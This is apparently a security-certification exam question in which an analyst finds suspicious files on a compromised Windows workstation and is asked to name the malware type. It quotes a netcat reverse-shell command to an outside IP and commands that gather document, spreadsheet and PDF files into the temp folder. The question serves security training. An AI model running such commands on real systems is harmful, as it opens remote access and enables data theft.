A security analyst believes an employee’s workstation has been compromised. The analyst reviews the system logs, but does not find any attempted logins. The analyst then runs the diff command, comparing the C:\Windows\System32 directory and the installed cache directory. The analyst finds a series of files that look suspicious.

One of the files contains the following commands:

cmd /C %TEMP%\nc -e cmd.exe 34.100.43.230

copy    *.doc    > %TEMP%\docfiles.zip

copy    *.xls    > %TEMP%\xlsfiles.zip

copy    *.pdf    > %TEMP%\pdffiles.zip

Which of the following types of malware was used?